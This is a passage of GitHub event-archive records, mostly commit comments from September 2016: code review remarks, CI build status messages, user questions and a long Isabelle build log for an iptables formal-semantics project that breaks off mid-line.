{"id":"4588809672","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19094005,"position":null,"line":null,"path":null,"commit_id":"3fe58d1c6f656c9829d6476d4ff0122fa75fab8f","created_at":"2016-09-20T10:34:35Z","updated_at":"2016-09-20T10:34:35Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33018/testReport/) for this commit**"}},"created_at":"2016-09-20T10:34:35Z"}
{"id":"4588811446","type":"CommitCommentEvent","actor":{"login":"zjykymt"},"repo":{"name":"zjykymt/freertos-stm32"},"payload":{"comment":{"id":19094019,"position":null,"line":null,"path":null,"commit_id":"1a588a012d0454570bb41c895559143d0e10212c","created_at":"2016-09-20T10:34:58Z","updated_at":"2016-09-20T10:34:58Z","body":"添加1st InvDef.c，优化Print task fn，修复MQTT downstream解析\r\n1、添加1st InvDef.c\r\n2、优化打印中task的功能CPU usage，时钟采用100us中断\r\n3、修复MQTT downstream解析\r\n4、发现LAN8720A PHY芯片的初始化时未检测到link网线的错误，如需可以下一步进行修复"}},"created_at":"2016-09-20T10:34:58Z"}
{"id":"4588813005","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094023,"position":42,"line":42,"path":"encrypted-media/scripts/setmediakeys-again-after-playback.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:35:19Z","updated_at":"2016-09-20T10:35:19Z","body":"Is it correct to resolve the promise here ? The test below says it is changing media keys \"while playing\"  but we have not started playback yet. Perhaps the promise should be resolved after we call `_video.play()` above ?"}},"created_at":"2016-09-20T10:35:19Z"}
{"id":"4588813687","type":"CommitCommentEvent","actor":{"login":"gajus"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19094026,"position":2,"line":2,"path":"schemas/webpackOptionsSchema.json","commit_id":"8c3d97d933e0f895b344355c3f9f39081a290d94","created_at":"2016-09-20T10:35:26Z","updated_at":"2016-09-20T10:35:26Z","body":"I am proceeding under an assumption that this was done by mistake, since `.editorconfig` has not been updated."}},"created_at":"2016-09-20T10:35:26Z"}
{"id":"4588813955","type":"CommitCommentEvent","actor":{"login":"Kunjan"},"repo":{"name":"QuickBase/DataAnalysisScripts"},"payload":{"comment":{"id":19094028,"position":null,"line":null,"path":null,"commit_id":"c3fcc8e208cfe2de8e835f8b0e89d054a928554d","created_at":"2016-09-20T10:35:31Z","updated_at":"2016-09-20T10:35:31Z","body":"I would recommend you to separate the Notebook and the individual Script. The script is easily versionable. This is not."}},"created_at":"2016-09-20T10:35:31Z"}
{"id":"4588814779","type":"CommitCommentEvent","actor":{"login":"TKuypers"},"repo":{"name":"TKuypers/klantenvertellen"},"payload":{"comment":{"id":19094029,"position":null,"line":null,"path":null,"commit_id":"8587d00ca028c5d95784b838aa983eaaf26807df","created_at":"2016-09-20T10:35:42Z","updated_at":"2016-09-20T10:35:42Z","body":"Als u een bericht wil sturen naar ties@expertees.nl kunnen we even verder kijken wat het probleem kan zijn."}},"created_at":"2016-09-20T10:35:42Z"}
{"id":"4588817252","type":"CommitCommentEvent","actor":{"login":"davidgfnet"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19094037,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T10:36:13Z","updated_at":"2016-09-20T10:36:13Z","body":"Hey can you comment on this patch? As far as my testing went, I think it did go into deep sleep for 10 minutes. Thanks!"}},"created_at":"2016-09-20T10:36:13Z"}
{"id":"4588817818","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094041,"position":43,"line":43,"path":"encrypted-media/scripts/setmediakeys-again-after-resetting-src.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:36:20Z","updated_at":"2016-09-20T10:36:20Z","body":"Please add a default duration of 1s, i.e. `( config.duration || 1 )`."}},"created_at":"2016-09-20T10:36:20Z"}
{"id":"4588824225","type":"CommitCommentEvent","actor":{"login":"schnittstabil"},"repo":{"name":"sindresorhus/is-empty-iterable"},"payload":{"comment":{"id":19094051,"position":11,"line":11,"path":"test.js","commit_id":"fcdafe2ff4b5ec47de2b25f5c201e287215a4fd9","created_at":"2016-09-20T10:37:44Z","updated_at":"2016-09-20T10:37:44Z","body":"There is no need for `Symbol.iterator`, following works too:\r\n```js\r\n\tconst iterable = (function * () {\r\n\t\tyield 1;\r\n\t})();\r\n\r\n\tconst emptyIterable = (function * () {})();\r\n```\r\n\r\nOr, depending on your needs:\r\n```js\r\n\tconst iterator = function * () {\r\n\t\tyield 1;\r\n\t};\r\n\r\n\tconst emptyIterator= function * () {};\r\n\r\n\tt.true(m(emptyIterator())); // creates a fresh iterable\r\n\tt.false(m(iterator()));\r\n```"}},"created_at":"2016-09-20T10:37:44Z"}
{"id":"4588827317","type":"CommitCommentEvent","actor":{"login":"sokra"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19094057,"position":2,"line":2,"path":"schemas/webpackOptionsSchema.json","commit_id":"8c3d97d933e0f895b344355c3f9f39081a290d94","created_at":"2016-09-20T10:38:23Z","updated_at":"2016-09-20T10:38:23Z","body":"yep, use spaces.\r\nThis commit changes tabs to spaces."}},"created_at":"2016-09-20T10:38:23Z"}
{"id":"4588827518","type":"CommitCommentEvent","actor":{"login":"spiderdijon"},"repo":{"name":"uArm-Developer/UArmForArduino"},"payload":{"comment":{"id":19094059,"position":null,"line":null,"path":null,"commit_id":"90ea44a506d4c85634e4674575d1260cfda2ad71","created_at":"2016-09-20T10:38:27Z","updated_at":"2016-09-20T10:38:27Z","body":"What is the preferred calibration method now this is removed?\r\n"}},"created_at":"2016-09-20T10:38:27Z"}
{"id":"4588833030","type":"CommitCommentEvent","actor":{"login":"gayanebet"},"repo":{"name":"gayanebet/test"},"payload":{"comment":{"id":19094069,"position":null,"line":null,"path":null,"commit_id":"212a5b9eb74ae6177919f52213fb01fac741ab4f","created_at":"2016-09-20T10:39:46Z","updated_at":"2016-09-20T10:39:46Z","body":"дщдщ"}},"created_at":"2016-09-20T10:39:46Z"}
{"id":"4588833134","type":"CommitCommentEvent","actor":{"login":"drjakob"},"repo":{"name":"uArm-Developer/UArmForArduino"},"payload":{"comment":{"id":19094070,"position":null,"line":null,"path":null,"commit_id":"90ea44a506d4c85634e4674575d1260cfda2ad71","created_at":"2016-09-20T10:39:47Z","updated_at":"2016-09-20T10:39:47Z","body":"I used the command line calibration succesful on osx (uarm-calibrate)."}},"created_at":"2016-09-20T10:39:47Z"}
{"id":"4588837373","type":"CommitCommentEvent","actor":{"login":"NAT0P0TAT0"},"repo":{"name":"thommoboy/There-are-no-brakes"},"payload":{"comment":{"id":19094078,"position":null,"line":null,"path":null,"commit_id":"8372dc7d93d997c77ef0d2d47e75a1fb74fc64fe","created_at":"2016-09-20T10:40:47Z","updated_at":"2016-09-20T10:40:47Z","body":"yeah they werent done for industrial level and back of adventurer level because they wouldnt be seen by players but whatever"}},"created_at":"2016-09-20T10:40:47Z"}
{"id":"4588839297","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094082,"position":52,"line":52,"path":"encrypted-media/scripts/setmediakeys-multiple-times-with-different-mediakeys.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:41:15Z","updated_at":"2016-09-20T10:41:15Z","body":"This comment is Chrome-specific."}},"created_at":"2016-09-20T10:41:15Z"}
{"id":"4588841451","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094087,"position":55,"line":55,"path":"encrypted-media/scripts/setmediakeys-multiple-times-with-different-mediakeys.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:41:44Z","updated_at":"2016-09-20T10:41:44Z","body":"I'm not sure the specification requires setMediaKeys to fail in this case, but it is allowed."}},"created_at":"2016-09-20T10:41:44Z"}
{"id":"4588842645","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094088,"position":65,"line":65,"path":"encrypted-media/scripts/setmediakeys-multiple-times-with-different-mediakeys.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:42:00Z","updated_at":"2016-09-20T10:42:00Z","body":"Chrome-specific comment."}},"created_at":"2016-09-20T10:42:00Z"}
{"id":"4588844094","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094090,"position":33,"line":33,"path":"encrypted-media/scripts/setmediakeys-multiple-times-with-the-same-mediakeys.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:42:20Z","updated_at":"2016-09-20T10:42:20Z","body":"Chrome-specific comment."}},"created_at":"2016-09-20T10:42:20Z"}
{"id":"4588844987","type":"CommitCommentEvent","actor":{"login":"jeszicawii"},"repo":{"name":"facebook/fbctf"},"payload":{"comment":{"id":19094093,"position":null,"line":null,"path":null,"commit_id":"6cab8b4b38535c6b04a91031e838e0961d188834","created_at":"2016-09-20T10:42:31Z","updated_at":"2016-09-20T10:42:31Z","body":"Any guidance on this? Can't seem to get it to work. Export is fine, but no import."}},"created_at":"2016-09-20T10:42:31Z"}
{"id":"4588845984","type":"CommitCommentEvent","actor":{"login":"inoas"},"repo":{"name":"FriendsOfCake/search"},"payload":{"comment":{"id":19094096,"position":6,"line":38,"path":"src/Controller/Component/PrgComponent.php","commit_id":"82818bd853f2f06cb64298af5f52546c88686360","created_at":"2016-09-20T10:42:45Z","updated_at":"2016-09-20T10:42:45Z","body":"At least now I do understand that return early means more (to some) than just returning early, more like \"failing\" early or \"aborting early\". If that's more important than strictly unnecessary negation. Thanks for explaining."}},"created_at":"2016-09-20T10:42:45Z"}
{"id":"4588847565","type":"CommitCommentEvent","actor":{"login":"michaelklishin"},"repo":{"name":"rabbitmq/rabbitmq-java-client"},"payload":{"comment":{"id":19094097,"position":null,"line":null,"path":null,"commit_id":"e5330720cb092c317b0138d45eaa2c66c802f212","created_at":"2016-09-20T10:43:09Z","updated_at":"2016-09-20T10:43:09Z","body":"I suspect the message meant to say \"connection\" and not \"channel\"?"}},"created_at":"2016-09-20T10:43:09Z"}
{"id":"4588856780","type":"CommitCommentEvent","actor":{"login":"jails"},"repo":{"name":"sitrunlab/learn-kahlan"},"payload":{"comment":{"id":19094111,"position":5,"line":42,"path":"spec/FooSpec.php","commit_id":"c1412f2e03c224493e299bf0b033031ddbbe58fb","created_at":"2016-09-20T10:45:16Z","updated_at":"2016-09-20T10:45:16Z","body":"Use `allow()` to create a stub."}},"created_at":"2016-09-20T10:45:16Z"}
{"id":"4588857809","type":"CommitCommentEvent","actor":{"login":"nsoranzo"},"repo":{"name":"dannon/pysam"},"payload":{"comment":{"id":19094112,"position":23,"line":861,"path":"pysam/ctabix.pyx","commit_id":"b2d358668b611ffbf1fbfa1eab306c0b0459473a","created_at":"2016-09-20T10:45:30Z","updated_at":"2016-09-20T10:45:30Z","body":"A better fix is in https://github.com/dannon/pysam/pull/2"}},"created_at":"2016-09-20T10:45:30Z"}
{"id":"4588860511","type":"CommitCommentEvent","actor":{"login":"mwatson2"},"repo":{"name":"sukhmal/web-platform-tests"},"payload":{"comment":{"id":19094117,"position":31,"line":31,"path":"encrypted-media/scripts/setmediakeys-to-multiple-video-elements.js","commit_id":"2a5c959ea1994cd8155ae2879451b8013bdae86a","created_at":"2016-09-20T10:46:09Z","updated_at":"2016-09-20T10:46:09Z","body":"The specification allows this to fail, but it is not required to fail."}},"created_at":"2016-09-20T10:46:09Z"}
{"id":"4588860532","type":"CommitCommentEvent","actor":{"login":"ndaidong"},"repo":{"name":"vinhlv/check-card"},"payload":{"comment":{"id":19094118,"position":7,"line":7,"path":"package.json","commit_id":"8ecf06aa5574b011c06d07f78ea8559466a2d342","created_at":"2016-09-20T10:46:09Z","updated_at":"2016-09-20T10:46:09Z","body":"Can use short path as below:\r\n\r\n```\r\n\"test\": \"mocha test\"\r\n```"}},"created_at":"2016-09-20T10:46:09Z"}
{"id":"4588862148","type":"CommitCommentEvent","actor":{"login":"chenxeed"},"repo":{"name":"chenxeed/framework-showcase"},"payload":{"comment":{"id":19094124,"position":18,"line":18,"path":"index.html","commit_id":"97bedad40b9e7a5092fc7cd3a75ea76d9e631aa7","created_at":"2016-09-20T10:46:34Z","updated_at":"2016-09-20T10:46:34Z","body":"This `To-Do` changes are not related to integrating cyclejs, sorry!"}},"created_at":"2016-09-20T10:46:34Z"}
{"id":"4588863198","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/hsg-project"},"payload":{"comment":{"id":19094128,"position":null,"line":null,"path":null,"commit_id":"f244cd5be7888aa5309531b404943043323e7ff7","created_at":"2016-09-20T10:46:48Z","updated_at":"2016-09-20T10:46:48Z","body":"Good catch, thanks!"}},"created_at":"2016-09-20T10:46:48Z"}
{"id":"4588874624","type":"CommitCommentEvent","actor":{"login":"robodair"},"repo":{"name":"sudouc/helloworld"},"payload":{"comment":{"id":19094144,"position":null,"line":null,"path":null,"commit_id":"eb4045c46fb262f48bd2c72c6740d61488cee567","created_at":"2016-09-20T10:49:38Z","updated_at":"2016-09-20T10:49:38Z","body":"Buzz Buzz"}},"created_at":"2016-09-20T10:49:38Z"}
{"id":"4588875470","type":"CommitCommentEvent","actor":{"login":"SL4GG4N"},"repo":{"name":"SL4GG4N/Labb2a"},"payload":{"comment":{"id":19094147,"position":null,"line":null,"path":null,"commit_id":"9a23659c90ae1431025629f7ceff7416e597b752","created_at":"2016-09-20T10:49:51Z","updated_at":"2016-09-20T10:49:51Z","body":"Hur andar jag dig nu walle?"}},"created_at":"2016-09-20T10:49:51Z"}
{"id":"4588880495","type":"CommitCommentEvent","actor":{"login":"ryyppy"},"repo":{"name":"css-components/styled-components"},"payload":{"comment":{"id":19094158,"position":5,"line":7,"path":"src/constructors/element.js","commit_id":"d26893061244c128152dd6b3bd4e5734b5beb188","created_at":"2016-09-20T10:51:07Z","updated_at":"2016-09-20T10:51:07Z","body":"Shouldn't this be `: typeof createElement`? "}},"created_at":"2016-09-20T10:51:07Z"}
{"id":"4588881250","type":"CommitCommentEvent","actor":{"login":"craigcarnell"},"repo":{"name":"torrancew/puppet-cron"},"payload":{"comment":{"id":19094161,"position":1,"line":1,"path":"CHANGELOG","commit_id":"47733ae978cfb8f65e45e297b547e41924124b5a","created_at":"2016-09-20T10:51:18Z","updated_at":"2016-09-20T10:51:18Z","body":"@torrancew please tag a new release?"}},"created_at":"2016-09-20T10:51:18Z"}
{"id":"4588886820","type":"CommitCommentEvent","actor":{"login":"busla"},"repo":{"name":"ilovezfs/homebrew-core"},"payload":{"comment":{"id":19094171,"position":null,"line":null,"path":null,"commit_id":"57c11f25e31ac8f12f89ab731f9f32bd5da9e569","created_at":"2016-09-20T10:52:43Z","updated_at":"2016-09-20T10:52:43Z","body":"So I don´t have to wait for this fix to be merged into Homebrew master, how can merge this PR locally?\r\n\r\n"}},"created_at":"2016-09-20T10:52:43Z"}
{"id":"4588891856","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/is-empty-iterable"},"payload":{"comment":{"id":19094182,"position":11,"line":11,"path":"test.js","commit_id":"fcdafe2ff4b5ec47de2b25f5c201e287215a4fd9","created_at":"2016-09-20T10:53:56Z","updated_at":"2016-09-20T10:53:56Z","body":"Those are not the same things: https://github.com/sindresorhus/is-empty-iterable/issues/1#issuecomment-248268208"}},"created_at":"2016-09-20T10:53:56Z"}
{"id":"4588892618","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19094185,"position":19,"line":544,"path":"src/FffPolygonGenerator.cpp","commit_id":"9ba3e301d615e0c42fb6bbed8a2c4771341850c4","created_at":"2016-09-20T10:54:08Z","updated_at":"2016-09-20T10:54:08Z","body":"Fractional angles are possible. Why not just `< 90`?"}},"created_at":"2016-09-20T10:54:08Z"}
{"id":"4588894399","type":"CommitCommentEvent","actor":{"login":"doozMen"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19094188,"position":10,"line":25,"path":"Example/Tests/ParseableSpec.swift","commit_id":"1475f99601874b73959e7f4836e2af03ed7254a0","created_at":"2016-09-20T10:54:36Z","updated_at":"2016-09-20T10:54:36Z","body":"Wat vind je van `relationsMap`?"}},"created_at":"2016-09-20T10:54:36Z"}
{"id":"4588894821","type":"CommitCommentEvent","actor":{"login":"doozMen"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19094189,"position":62,"line":84,"path":"README.md","commit_id":"1475f99601874b73959e7f4836e2af03ed7254a0","created_at":"2016-09-20T10:54:41Z","updated_at":"2016-09-20T10:54:41Z","body":"Wat vind je van `relationsMap`?"}},"created_at":"2016-09-20T10:54:41Z"}
{"id":"4588895988","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"ilovezfs/homebrew-core"},"payload":{"comment":{"id":19094191,"position":null,"line":null,"path":null,"commit_id":"57c11f25e31ac8f12f89ab731f9f32bd5da9e569","created_at":"2016-09-20T10:54:59Z","updated_at":"2016-09-20T10:54:59Z","body":"@busla I will merge it right now and then you can brew update."}},"created_at":"2016-09-20T10:54:59Z"}
{"id":"4588896801","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19094192,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T10:55:11Z","updated_at":"2016-09-20T10:55:11Z","body":"@ih24n69 First, you need to define your hardware using this https://github.com/ngoquang2708/android_kernel_samsung_vivalto3gvn/commit/fb5544963259491d8f629980c53c59359f5b2734.\r\nSecond, you need to update SELinux in your kernel to be compatible with M. "}},"created_at":"2016-09-20T10:55:11Z"}
{"id":"4588906616","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19094210,"position":null,"line":null,"path":null,"commit_id":"5a5b672682aed9bbd7962d46b57e4e56a56cbce9","created_at":"2016-09-20T10:57:31Z","updated_at":"2016-09-20T10:57:31Z","body":"And there we got the broken links again."}},"created_at":"2016-09-20T10:57:31Z"}
{"id":"4588909447","type":"CommitCommentEvent","actor":{"login":"busla"},"repo":{"name":"ilovezfs/homebrew-core"},"payload":{"comment":{"id":19094212,"position":null,"line":null,"path":null,"commit_id":"57c11f25e31ac8f12f89ab731f9f32bd5da9e569","created_at":"2016-09-20T10:58:11Z","updated_at":"2016-09-20T10:58:11Z","body":"YES!"}},"created_at":"2016-09-20T10:58:11Z"}
{"id":"4588914481","type":"CommitCommentEvent","actor":{"login":"DilanArsalan"},"repo":{"name":"DilanArsalan/kurdi"},"payload":{"comment":{"id":19094221,"position":null,"line":null,"path":null,"commit_id":"733c79a67f39ce95caec8467d0ff3f7d5ee24142","created_at":"2016-09-20T10:59:24Z","updated_at":"2016-09-20T10:59:24Z","body":"i forked the kurdi github then clone the kurdi to the hello world folder then go to the kurdi by cd kurdi init git and git add . lab lab  and touch test.txt other processes after all pushed into origin master and now changed it,write for u how i do it."}},"created_at":"2016-09-20T10:59:24Z"}
{"id":"4588915795","type":"CommitCommentEvent","actor":{"login":"Elland"},"repo":{"name":"bakkenbaeck/pinboard-ios"},"payload":{"comment":{"id":19094224,"position":null,"line":null,"path":null,"commit_id":"f67d9b5f0961e8be7187e1ad7b887f9dc4c09d4f","created_at":"2016-09-20T10:59:46Z","updated_at":"2016-09-20T10:59:46Z","body":"💃 💀 \r\ndancing on our graves"}},"created_at":"2016-09-20T10:59:46Z"}
{"id":"4588918039","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19094230,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-20T11:00:18Z","updated_at":"2016-09-20T11:00:18Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.173](http://build.clear-measure.com/viewLog.html?buildId=10491&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-20T11:00:18Z"}
{"id":"4588924551","type":"CommitCommentEvent","actor":{"login":"Fsu0413"},"repo":{"name":"lwtmusou/touhoukill"},"payload":{"comment":{"id":19094239,"position":5,"line":1469,"path":"src/package/th06.cpp","commit_id":"b8df57485e94c49ec52e5643b803ed18fc3703c8","created_at":"2016-09-20T11:01:53Z","updated_at":"2016-09-20T11:01:53Z","body":"什么鬼？"}},"created_at":"2016-09-20T11:01:53Z"}
{"id":"4588928778","type":"CommitCommentEvent","actor":{"login":"kovetskiy"},"repo":{"name":"reconquest/args"},"payload":{"comment":{"id":19094248,"position":3,"line":3,"path":".gitignore","commit_id":"ec9e7b1f2143fd342a4341b02bce77abf0ef595c","created_at":"2016-09-20T11:02:55Z","updated_at":"2016-09-20T11:02:55Z","body":"too much"}},"created_at":"2016-09-20T11:02:55Z"}
{"id":"4588930473","type":"CommitCommentEvent","actor":{"login":"kovetskiy"},"repo":{"name":"reconquest/args"},"payload":{"comment":{"id":19094250,"position":3,"line":3,"path":"README.md","commit_id":"ec9e7b1f2143fd342a4341b02bce77abf0ef595c","created_at":"2016-09-20T11:03:03Z","updated_at":"2016-09-20T11:03:03Z","body":"provides"}},"created_at":"2016-09-20T11:03:03Z"}
{"id":"4588930849","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19094252,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-20T11:03:09Z","updated_at":"2016-09-20T11:03:09Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.173](http://build.clear-measure.com/viewLog.html?buildId=10491&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:51"}},"created_at":"2016-09-20T11:03:09Z"}
{"id":"4588934011","type":"CommitCommentEvent","actor":{"login":"vladimir-kotikov"},"repo":{"name":"matrosovN/cordova-plugin-file"},"payload":{"comment":{"id":19094260,"position":null,"line":null,"path":null,"commit_id":"0e90bf8635e11a6ed6c3bfcdcc36511b5ab73c10","created_at":"2016-09-20T11:03:52Z","updated_at":"2016-09-20T11:03:52Z","body":"Rephrase 'We replace match result on empty symbol...' -> 'Removing leading slash to avoid duplicating because...'. Otherwise LGTM\r\n"}},"created_at":"2016-09-20T11:03:52Z"}
{"id":"4588939114","type":"CommitCommentEvent","actor":{"login":"DeepSOIC"},"repo":{"name":"usakhelo/FreeCAD"},"payload":{"comment":{"id":19094270,"position":21,"line":288,"path":"src/Mod/PartDesign/Gui/ViewProviderDatum.cpp","commit_id":"b9294f0b142aa529c81533b8b60f38f8bd06561b","created_at":"2016-09-20T11:04:55Z","updated_at":"2016-09-20T11:04:55Z","body":"Just wondering, is it at all necessary to change to PartDesign workbench here? I think it's not. But who knows... Feel free to leave as is."}},"created_at":"2016-09-20T11:04:55Z"}
{"id":"4588939625","type":"CommitCommentEvent","actor":{"login":"Oliverkoffi82"},"repo":{"name":"Oliverkoffi82/hello-world"},"payload":{"comment":{"id":19094272,"position":null,"line":null,"path":null,"commit_id":"81219dd0c24ab69319bd5ff70bd23e6c635ddbaf","created_at":"2016-09-20T11:05:03Z","updated_at":"2016-09-20T11:05:03Z","body":"![img_0681](https://cloud.githubusercontent.com/assets/22315449/18667868/3da376b2-7f2a-11e6-9a3c-70ad4f1f27d2.JPG)\r\n"}},"created_at":"2016-09-20T11:05:03Z"}
{"id":"4588943521","type":"CommitCommentEvent","actor":{"login":"maxcnunes"},"repo":{"name":"sqlectron/sqlectron-gui"},"payload":{"comment":{"id":19094278,"position":1,"line":1,"path":"docs/development/docker-databases.md","commit_id":"7a296c0ab145eb8ff3230341fa08843afdc28e6c","created_at":"2016-09-20T11:05:59Z","updated_at":"2016-09-20T11:05:59Z","body":"Thanks :)"}},"created_at":"2016-09-20T11:05:59Z"}
{"id":"4588944032","type":"CommitCommentEvent","actor":{"login":"yhoogstrate"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":19094281,"position":null,"line":null,"path":null,"commit_id":"8d505a93e40f33c61c10d90a2b6f14541dbf940f","created_at":"2016-09-20T11:06:06Z","updated_at":"2016-09-20T11:06:06Z","body":"Dear @ekg ,\r\n\r\nI am unable to build `vg` on my arch instance which uses GCC6. It crashes on protobuf because it misses an include to <algorithm>. The following change in protobuf fixed the issue: https://github.com/google/protobuf/pull/2090/commits/82133ba00b199e659b703852d7570fe3e62fd5df\r\nCould you bump protobuf again?\r\n\r\nThanks in advance,\r\n\r\nYouri"}},"created_at":"2016-09-20T11:06:06Z"}
{"id":"4588944077","type":"CommitCommentEvent","actor":{"login":"diekmann"},"repo":{"name":"diekmann/Iptables_Semantics"},"payload":{"comment":{"id":19094282,"position":null,"line":null,"path":null,"commit_id":"48052df168ee50eadaccfc1f9b4332bacf2e137b","created_at":"2016-09-20T11:06:07Z","updated_at":"2016-09-20T11:06:07Z","body":"mwn cloud:\r\n\r\n```\r\n ../Isabelle2016/bin/isabelle build -v -D . -o threads=8 -o document=pdf\r\nStarted at Di 20. Sep 01:47:05 CEST 2016 (polyml-5.6_x86_64-linux on vm-10-155-208-79)\r\nISABELLE_BUILD_OPTIONS=\"\"\r\n\r\nISABELLE_BUILD_JAVA_OPTIONS=\"-Djava.awt.headless=true -Xms512m -Xmx2560m -Xss4m\"\r\n\r\nML_PLATFORM=\"x86_64-linux\"\r\nML_HOME=\"/root/Isabelle2016/contrib/polyml-5.6-1/x86_64-linux\"\r\nML_SYSTEM=\"polyml-5.6\"\r\nML_OPTIONS=\"-H 1000\"\r\n\r\nSession Pure/Pure\r\nSession HOL/HOL (main)\r\nSession HOL/HOL-Word (main)\r\nSession AFP/Word_Lib (AFP)\r\nSession Iptables_Semantics/IP_Addresses\r\nSession Iptables_Semantics/Bitmagic\r\nSession Simple_Firewall/Simple_Firewall\r\nSession Routing/Routing\r\nSession Iptables_Semantics/Iptables_Semantics\r\nSession Iptables_Semantics/Iptables_Semantics_Documentation\r\nSession Iptables_Semantics/Iptables_Semantics_Examples\r\nSession Iptables_Semantics/Iptables_Semantics_Examples_Large1\r\nSession Iptables_Semantics/Iptables_Semantics_Examples_Large2\r\nSession OpenFlow/OpenFlow\r\nSession OpenFlow/OpenFlow_Documentation\r\nBuilding Routing ...\r\nRouting: theory Adhoc_Overloading\r\nRouting: theory Monad_Syntax\r\nRouting: theory Linorder_Helper\r\nRouting: theory Routing_Table\r\nRouting: theory IpRoute_Parser\r\nRouting: theory Linux_Router\r\nTiming Routing (8 threads, 9.757s elapsed time, 26.192s cpu time, 0.816s GC time, factor 2.68)\r\nDocument at /root/.isabelle/Isabelle2016/browser_info/Routing/Routing/document.pdf\r\nFinished Routing (0:00:51 elapsed time, 0:01:07 cpu time, factor 1.31)\r\nBuilding Iptables_Semantics ...\r\nIptables_Semantics: theory List_Misc\r\nIptables_Semantics: theory Negation_Type\r\nIptables_Semantics: theory More_Bits_Int\r\nIptables_Semantics: theory LaTeXsugar\r\nIptables_Semantics: theory WordInterval_Lists\r\nIptables_Semantics: theory Bits_Integer\r\nIptables_Semantics: theory Code_Target_Bits_Int\r\nIptables_Semantics: theory Datatype_Selectors\r\nIptables_Semantics: theory Conntrack_State\r\nIptables_Semantics: theory Negation_Type_DNF\r\nIptables_Semantics: theory Remdups_Rev\r\nIptables_Semantics: theory Repeat_Stabilize\r\nIptables_Semantics: theory Ternary\r\nIptables_Semantics: theory L4_Protocol_Flags\r\nIptables_Semantics: theory SimpleFw_toString\r\nIptables_Semantics: theory IpAddresses\r\nIptables_Semantics: theory Firewall_Common\r\nIptables_Semantics: theory Word_Upto\r\nIptables_Semantics: theory Ports\r\nIptables_Semantics: theory Tagged_Packet\r\nIptables_Semantics: theory Common_Primitive_Syntax\r\nIptables_Semantics: theory Semantics\r\nIptables_Semantics: theory Matching_Ternary\r\nIptables_Semantics: theory Semantics_Goto\r\nIptables_Semantics: theory Matching\r\nIptables_Semantics: theory Semantics_Stateful\r\nIptables_Semantics: theory Ruleset_Update\r\nIptables_Semantics: theory Call_Return_Unfolding\r\nIptables_Semantics: theory Semantics_Ternary\r\nIptables_Semantics: theory Unknown_Match_Tacs\r\nIptables_Semantics: theory Matching_Embeddings\r\nIptables_Semantics: theory Fixed_Action\r\nIptables_Semantics: theory Common_Primitive_Matcher_Generic\r\nIptables_Semantics: theory Normalized_Matches\r\nIptables_Semantics: theory Negation_Type_Matching\r\nIptables_Semantics: theory Primitive_Normalization\r\nIptables_Semantics: theory Packet_Set_Impl\r\nIptables_Semantics: theory Common_Primitive_Matcher\r\nIptables_Semantics: theory MatchExpr_Fold\r\nIptables_Semantics: theory Ipassmt\r\nIptables_Semantics: theory Routing_IpAssmt\r\nIptables_Semantics: theory Packet_Set\r\nIptables_Semantics: theory Optimizing\r\nIptables_Semantics: theory Common_Primitive_Lemmas\r\nIptables_Semantics: theory 